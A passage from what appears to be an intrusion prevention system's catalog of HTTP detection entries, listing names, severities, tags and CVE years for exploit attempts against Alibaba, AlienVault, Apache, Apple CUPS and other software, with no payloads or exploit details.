Tags: Any Operating System, Any Hardware, Agent Tesla, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Vulnerability: Agent-Tesla-Panel-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Alibaba-DOS

About this situation: Alibaba Dos
Context: HTTP Client Stream
Severity: 2
Tags: Windows, x86, Computer Software Manufaktur Alibaba, CVE1999, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-333-4219
Last changed: sgpkg-ips-355-4219
Vulnerability: HTTP-Alibaba-Remote-Command-Execution-Vulnerability
Description:
Back to top

HTTP_CS-Alibaba-Nacos-Authfilter-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Alibaba Nacos detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Alibaba Nacos, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Vulnerability: Alibaba-Nacos-Authfilter-Authentication-Bypass
Description:
Back to top

HTTP_CS-Alibaba-Nacos-ConfigOpsController-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Alibaba Nacos detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2021, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1375-5242
Last changed: sgpkg-ips-1375-5242
Vulnerability: Alibaba-Nacos-ConfigOpsController-Authentication-Bypass
Description:
Back to top

HTTP_CS-Alienvault-Ossim-AV-Centerd-Util.pm-Get_License-Arbitrary-Command-Execution

About this situation: An attempt to exploit a vulnerability in AlienVault AlienVault detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, AlienVault AlienVault, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1711-5242
Vulnerability: Alienvault-Ossim-AV-Centerd-Util.pm-Get_License-Arbitrary-Command-Execution
Description:
Back to top

HTTP_CS-Alienvault-Ossim-AV-Centerd-Util.pm-Request-Arbitrary-Command-Execution

About this situation: An attempt to exploit a vulnerability in AlienVault AlienVault detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, AlienVault AlienVault, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Alienvault-Ossim-AV-Centerd-Util.pm-Request-Arbitrary-Command-Execution
Description:
Back to top

HTTP_CS-Allegra-Excel-Import-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Allegra detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Allegra, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1699-5242
Last changed: sgpkg-ips-1719-5242
Vulnerability: Allegra-Excel-Import-Insecure-Deserialization
Description:
Back to top

HTTP_CS-Android-Gingermaster.A-3-Traffic

About this situation: Android GingerMaster.A-3 traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Android-Gingermaster
Description:
Back to top

HTTP_CS-AOL-Instant-Messenger-Usage

About this situation: Detects AOL Instant Messenger usage
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, AOL Instant Messenger, Any Operating System not specific, Instant Messaging, TCP Client Traffic
First detected in: sgpkg-ips-129-2032
Last changed: sgpkg-ips-1618-5242
Vulnerability: AOL-Instant-Messenger-Usage
Description:
Back to top

HTTP_CS-Apache-APISIX-Admin-API-Default-Access-Token-RCE

About this situation: An attempt to exploit a vulnerability in Apache APISIX detected.
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Any Hardware, Apache APISIX, CVE2020, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: Apache-APISIX-Admin-API-Default-Access-Token-RCE
Description:
Back to top

HTTP_CS-Apache-Apr-Util-IPv6-URI-Parsing-Vulnerability

About this situation: An Apache apr-util IPv6 URI Parsing vulnerability
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2004, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: Apache-Apr-Util-IPv6-URI-Parsing-Vulnerability
Description:
Back to top

HTTP_CS-Apache-Axis-Jsp-File-Upload

About this situation: JSP file upload towards Apache Tomcat detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Axis, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-625-5211
Vulnerability: Apache-Axis-Jsp-File-Upload
Description:
Back to top

HTTP_CS-Apache-Chunked-Encoding-BO-4

About this situation: Apache Chunked Encoding Buffer Overflow
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Apache, CVE2002, Any Operating System not specific, Apache not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Apache-Chunked-Encoding-BOF
Description:
Back to top

HTTP_CS-Apache-Commons-Fileupload-Parserequest-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Commons FileUpload detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Commons FileUpload, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1633-5242
Last changed: sgpkg-ips-1633-5242
Vulnerability: Apache-Commons-Fileupload-Parserequest-Denial-Of-Service
Description:
Back to top

HTTP_CS-Apache-Commons-Text-Remote-Code-Execution-CVE-2022-42889

About this situation: An attempt to exploit a vulnerability in Apache Commons Text detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Commons Text, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1517-5242
Last changed: sgpkg-ips-1518-5242
Vulnerability: Apache-Commons-Text-Remote-Code-Execution-CVE-2022-42889
Description:
Back to top

HTTP_CS-Apache-Couchdb-JSON-Remote-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation CouchDB detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation CouchDB, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1021-5242
Last changed: sgpkg-ips-1021-5242
Vulnerability: Apache-Couchdb-JSON-Remote-Privilege-Escalation
Description:
Back to top

HTTP_CS-Apache-Crlf-DoS

About this situation: Apache Crlf Resource Starvation Denial of Service
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2003, Any Operating System not specific, Apache not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-277-4219
Vulnerability: HTTP-Apache-Crlf-Resource-Starvation-DoS
Description:
Back to top

HTTP_CS-Apache-HTTP-Server-Mod-Dav-Merge-Request-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2013, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-535-5211
Vulnerability: Apache-HTTP-Server-Mod-Dav-Merge-Request-Denial-Of-Service
Description:
Back to top

HTTP_CS-Apache-HTTP-Server-Mod_tcl-Module-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation mod_tcl Module detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2006, Any Operating System not specific, Apache not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-537-5211
Vulnerability: Apache-HTTP-Server-Mod_tcl-Module-Format-String-Vulnerability
Description:
Back to top

HTTP_CS-Apache-Httpd-Mod_HTTP2-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2017, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1019-5242
Last changed: sgpkg-ips-1019-5242
Vulnerability: Apache-Httpd-Mod_HTTP2-Null-Pointer-Dereference
Description:
Back to top

HTTP_CS-Apache-Httpd-Mod_Lua-req_parsebody-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache httpd detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2022, Any Operating System not specific, Apache not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1469-5242
Last changed: sgpkg-ips-1469-5242
Vulnerability: Apache-Httpd-Mod_Lua-req_parsebody-Denial-Of-Service
Description:
Back to top

HTTP_CS-Apache-Httpd-Mod_Lua-req_parsebody-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation httpd detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation httpd, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1425-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Apache-Httpd-Mod_Lua-req_parsebody-Integer-Underflow
Description:
Back to top

HTTP_CS-Apache-Httpd-Mod_Proxy-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache mod_proxy, IBM HTTP Server for OS/400, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1012-5242
Last changed: sgpkg-ips-1012-5242
Vulnerability: Apache-Httpd-Mod_Proxy-Security-Bypass
Description:
Back to top

HTTP_CS-Apache-Httpd-Mod_Proxy_ajp-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2011, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-593-5211
Last changed: sgpkg-ips-1611-5242
Vulnerability: Apache-Httpd-Mod_Proxy_ajp-Denial-Of-Service
Description:
Back to top

HTTP_CS-Apache-Httpd-Mod_remoteip-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation httpd detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2019, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1188-5242
Vulnerability: Apache-Httpd-Mod_remoteip-Buffer-Overflow
Description:
Back to top

HTTP_CS-Apache-Httpd-Mod_sed-CVE-2022-30522-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Apache httpd detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation httpd, CVE2022, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1487-5242
Last changed: sgpkg-ips-1770-5242
Vulnerability: Apache-Httpd-Mod_sed-CVE-2022-30522-Denial-of-Service
Description:
Back to top

HTTP_CS-Apache-ISAPI-Module-Dangling-Pointer

About this situation: An attempt to exploit a vulnerability in Apache web server was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Apache, CVE2010, Windows not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-292-4219
Last changed: sgpkg-ips-292-4219
Vulnerability: Apache-ISAPI-Module-Dangling-Pointer
Description:
Back to top

HTTP_CS-Apache-ISAPI-Module-Dangling-Pointer-2

About this situation: An attempt to exploit a vulnerability in Apache web server was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Apache, CVE2010, Windows not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1511-5242
Vulnerability: Apache-ISAPI-Module-Dangling-Pointer
Description:
Back to top

HTTP_CS-Apache-Jspwiki-Upload-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation JSPWiki detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation JSPWiki, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1752-5242
Last changed: sgpkg-ips-1754-5242
Vulnerability: Apache-Jspwiki-Upload-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Apache-Kylin-Rest-API-Admin-Configuration-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Kylin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Kylin, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Apache-Kylin-Rest-API-Admin-Configuration-Information-Disclosure
Description:
Back to top

HTTP_CS-Apache-NiFi-API-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache NiFi detected.
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Unix, Any Hardware, Apache NiFi, Windows not specific, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Vulnerability: Apache-NiFi-API-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Apache-Olingo-XML-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Apache Olingo detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Olingo, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1218-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Apache-Olingo-XML-External-Entity-Injection
Description:
Back to top

HTTP_CS-Apache-Portable-Runtime-Apr-Psprintf-Long-String-Vulnerability

About this situation: Detects WebDAV PROPFIND requests with a long string in the xmlns field
Context: HTTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, Apache, CVE2003, Windows not specific, Apache not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-Apache-Portable-Runtime-Apr-Psprintf-Long-String-Vulnerability
Description:
Back to top

HTTP_CS-Apache-Portable-Runtime-Apr-Psprintf-Long-String-Vulnerability-Suspected

About this situation: Detects WebDAV PROPFIND requests with a long string in the xmlns field
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Apache, CVE2003, Windows not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-Apache-Portable-Runtime-Apr-Psprintf-Long-String-Vulnerability
Description:
Back to top

HTTP_CS-Apache-ShenYu-Plugin-API-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Apache ShenYu Admin detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache ShenYu Admin, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1451-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Apache-ShenYu-Plugin-API-Information-Disclosure
Description:
Back to top

HTTP_CS-Apache-Struts-File-Upload-Vulnerabilities-CVE-2023-50164-CVE-2024-53677

About this situation: An attempt to exploit a vulnerability in Apache Struts detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2023, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1665-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Apache-Struts-File-Upload-Vulnerability-CVE-2023-50164
Apache-Struts-File-Upload-Vulnerability-CVE-2024-53677
Description:
Back to top

HTTP_CS-Apache-Struts-OGNL-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: Apache-Struts-OGNL-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Apache-Struts-OGNL-Remote-Code-Execution-CVE-2020-17530

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: Apache-Struts-OGNL-Remote-Code-Execution-CVE-2020-17530
Description:
Back to top

HTTP_CS-Apache-Struts2-File-Upload-DoS

About this situation: An attempt to exploit a vulnerability in Apache Struts2 detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2019, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1275-5242
Last changed: sgpkg-ips-1275-5242
Vulnerability: Apache-Struts2-File-Upload-DoS
Description:
Back to top

HTTP_CS-Apache-Subversion-Mod_Dav_SVN-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Subversion detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Subversion, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Apache-Subversion-Mod_Dav_SVN-Denial-Of-Service
Description:
Back to top

HTTP_CS-Apache-Superset-Import-Dashboards-CVE-2018-8021

About this situation: An attempt to exploit a vulnerability in Apache Superset detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Superset, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1384-5242
Last changed: sgpkg-ips-1384-5242
Vulnerability: Apache-Superset-Import-Dashboards-CVE-2018-8021
Description:
Back to top

HTTP_CS-Apache-Tika-Header-Command-Injection

About this situation: An attempt to exploit a vulnerability in Apache Tika detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Apache Tika, CVE2018, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1200-5242
Vulnerability: Apache-Tika-Header-Command-Injection
Description:
Back to top

HTTP_CS-Apache-Tomcat-Chunked-Transfer-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Tomcat detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1008-5242
Vulnerability: Apache-Tomcat-Chunked-Transfer-Denial-Of-Service
Description:
Back to top

HTTP_CS-Apache-Tomcat-Chunkedinputfilter-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Tomcat detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-938-5242
Last changed: sgpkg-ips-938-5242
Vulnerability: Apache-Tomcat-Chunkedinputfilter-Denial-Of-Service
Description:
Back to top

HTTP_CS-Apache-Tomcat-HTTP2parser-Denial-Of-Service-CVE-2024-24549

About this situation: An attempt to exploit a vulnerability in Apache Tomcat detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Vulnerability: Apache-Tomcat-HTTP2parser-Denial-Of-Service-CVE-2024-24549
Description:
Back to top

HTTP_CS-Apache-Tomcat-Manager-Authenticated-Upload-Code-Execution

About this situation: An attempt to exploit an Apache Tomcat Manager Authenticated Upload Code Execution vulnerability detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, Apache Tomcat, CVE2010, Windows not specific, Linux not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-786-5211
Last changed: sgpkg-ips-1621-5242
Vulnerability: Apache-Tomcat-Manager-Authenticated-Upload-Code-Execution
Description:
Back to top

HTTP_CS-Apache-Tomcat-Manager-Authenticated-Upload-Code-Execution-2

About this situation: An attempt to exploit an Apache Tomcat Manager Authenticated Upload Code Execution vulnerability detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, Apache Tomcat, CVE2010, Windows not specific, Linux not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-864-5242
Last changed: sgpkg-ips-864-5242
Vulnerability: Apache-Tomcat-Manager-Authenticated-Upload-Code-Execution
Description:
Back to top

HTTP_CS-Apache-Tomcat-Snp-Access

About this situation: Apache Tomcat snp access
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2000, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-867-5242
Vulnerability: HTTP-Apache-Tomcat-Snp-Information-Disclosure
Description:
Back to top

HTTP_CS-Apache-Tomcat-Transfer-Encoding-Information-Disclosure

About this situation: An attempt to exploit an Apache Tomcat Transfer-Encoding Information Disclosure vulnerability detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-794-5211
Last changed: sgpkg-ips-794-5211
Vulnerability: Apache-Tomcat-Transfer-Encoding-Information-Disclosure
Description:
Back to top

HTTP_CS-Apache-Tomcat-WebSocket-Infinite-Loop-DoS

About this situation: An attempt to exploit a vulnerability in Apache Tomcat detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2020, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1380-5242
Vulnerability: Apache-Tomcat-WebSocket-Infinite-Loop-DoS
Description:
Back to top

HTTP_CS-Apache-WebDAV-Propfind-Access

About this situation: Access to WebDAV propfind in Apache
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Apache, CVE2000, Any Operating System not specific, Apache not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: HTTP-Apache-WebDAV-Propfind-Dir-Disclosure
Description:
Back to top

HTTP_CS-Apache2-Out-Of-Memory-DoS

About this situation: Apache2 DoS
Context: HTTP Client Stream
Severity: 2
Tags: HP-UX, OS X, Linux, Any Hardware, Apache2, CVE2004, HP-UX not specific, OS X not specific, Linux not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-506-5211
Vulnerability: HTTP-Apache2-Consume-Memory-DoS
Description:
Back to top

HTTP_CS-Apple-CUPS-Cupsd-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Apple Computer Common UNIX Printing System (CUPS) detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple Common UNIX Printing System, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-920-5242
Vulnerability: Apple-CUPS-Cupsd-Privilege-Escalation
Description:
Back to top

HTTP_CS-Apple-CUPS-Cupsddoselect-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apple Common UNIX Printing System (CUPS) detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Common UNIX Printing System, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Apple-CUPS-Cupsddoselect-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Apple-CUPS-IPP-Use-After-Free-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Computer Common UNIX Printing System (CUPS) detected
Context: HTTP Client Stream
Severity: 7
